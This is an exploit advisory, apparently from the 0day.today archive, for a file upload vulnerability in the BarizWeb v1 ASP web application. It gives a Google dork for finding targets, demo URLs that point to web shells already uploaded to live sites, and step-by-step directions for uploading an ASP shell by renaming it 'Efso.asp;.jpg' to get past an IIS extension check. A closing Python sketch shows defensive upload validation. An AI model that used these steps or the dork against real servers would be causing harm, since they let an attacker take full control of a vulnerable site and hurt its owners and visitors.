BarizWeb v1 - R|File Upload Vulnerability (BP Method)

2011-03-13T00:00:00
ID 1337DAY-ID-15588
Type zdt
Reporter KnocKout
Modified 2011-03-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
-----------------------------------------------------------
I MEMBER FROM IN3CT0R TEAM.
1337 DAY ..
                       
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[E-Mail] : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : Pretorian, DaiMon, BARCOD3
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : BarizWeb
|~Price : Free
|~Version : 1
|~Software: http://www.barizweb.com
|~Vulnerability Style : File Upload
Google Dork : "web tasarım: Barizweb.com"
-----------------------------------------------------------
Demos
-----------------------------------------------------------
http://test.barizweb.com/resimler/efso.asp;.jpg?
http://www.2000ambalaj.com.tr/resimler/rosespy8_beta.asp;.jpg
----------------------------------------

Exploitable..
Go to:
http://Victim/Path/panel/resim_yukle_dosya_verileri.asp
OKAY...
Now use the Microsoft IIS bypass method:
Shell name : Efso.asp
Shell name change : Efso.asp;.jpg
OKAY..
Click the button.
The shell is uploaded.
Go to the shell address:

http://Victim/Path/resimler/[Efsoname.asp;.jpg]
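
The rename above works when the upload form trusts only the final extension while an affected IIS version selects the ASP handler from the part before the semicolon. The following is an added example, not code from BarizWeb or from the advisory: a Python sketch contrasting that weak check (assumed here to be a last-extension test) with a strict allow-list and a server-generated storage name. The function names and the allowed extension set are assumptions.

```python
import os
import re
import secrets

# Assumed allow-list for an image upload form (not taken from BarizWeb).
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

def naive_check(filename):
    """Weak pattern: trusts whatever follows the last dot."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT

def strict_check(filename):
    """Allow one image extension and a stem of [A-Za-z0-9_-] only.

    The stem rule rejects ';', extra dots, spaces and NUL bytes, so no
    earlier segment such as '.asp' can reach the web server's handler
    mapping.
    """
    # Some clients send a full path; only the last component is examined.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    stem, ext = os.path.splitext(base)
    return (re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem) is not None
            and ext.lower() in ALLOWED_EXT)

def stored_name(filename):
    """Validate, then return a random server-side name with the vetted extension."""
    if not strict_check(filename):
        raise ValueError("rejected upload name: %r" % filename)
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()

if __name__ == "__main__":
    # Constructed sample names; the second is the pattern from the advisory.
    for name in ["holiday.JPG", "Efso.asp;.jpg", "a.asp", "x.php.png"]:
        print("%-14s naive=%-5s strict=%s"
              % (name, naive_check(name), strict_check(name)))
```

Pair this with an upload directory that has script execution disabled, so a name that slips through is still served as static content.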


-------------------------------------------------------------

#  0day.today [2018-03-01]  #